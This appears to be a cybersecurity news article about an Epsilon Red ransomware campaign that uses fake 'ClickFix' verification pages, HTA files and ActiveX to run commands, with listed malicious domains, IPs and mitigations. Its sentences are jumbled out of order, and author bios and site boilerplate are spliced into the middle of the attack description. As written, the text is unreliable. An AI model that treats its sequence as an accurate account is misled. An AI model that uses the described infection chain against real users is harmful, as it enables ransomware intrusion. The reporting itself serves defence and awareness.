Beyond file encryption, the technique exposes a deeper security gap: any legacy-enabled ActiveX environment can be commandeered to launch native binaries directly from a browser session, sidestepping download quarantine, SmartScreen, and most endpoint defenses. Once the button is pressed, the site redirects to a secondary page configured to run embedded ActiveX controls—an antiquated yet still-enabled Windows technology—allowing arbitrary command execution within Internet Explorer’s rendering engine. Disabling ActiveX and WSH, enforcing modern browser policies, and continuously blacklisting the identified domains and IPs are the most immediate mitigations while deeper network hardening and user-focused phishing simulations remain essential. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. CloudSEK analysts tied the hosting infrastructure to domains such as twtich[.]cc and capchabot[.]cc, and to IP addresses 155.94.155.227 :2269 and 213.209.150.188 :8112, confirming a cohesive network operated by the same threat actor cluster. After triggering the ActiveX object, malicious code invokes the Windows Script Host (WSH) to spawn a hidden command shell. Victims suffer rapid data encryption typical of Epsilon Red, with ransom notes loosely styled after REvil’s infamous communiqué yet featuring minor grammatical tweaks. The campaign, which has spread globally, masquerades as innocuous verification pages branded as “ClickFix,” luring users who frequent popular platforms such as Discord, Twitch, Kick, and OnlyFans. CloudSEK researchers noted that this redirection technique departs from earlier clipboard-based Epsilon Red lures, giving the current iteration a markedly higher infection success rate. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. From there, a small PowerShell-like command pulls a binary from attacker infrastructure, executes it in memory, and leaves virtually no visible artifact during the initial compromise. A new wave of ransomware attacks has surfaced in July 2025, leveraging weaponized HTML (.HTA) files to silently deploy the Epsilon Red strain of ransomware. The attack begins with a spoofed verification portal that prompts a user to “prove” authenticity before accessing content. Running within the same WSH process, the ransomware gains full user-level privileges, schedules persistence via schtasks, and begins network discovery.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 25 Jul 2025 11:45:12 +0000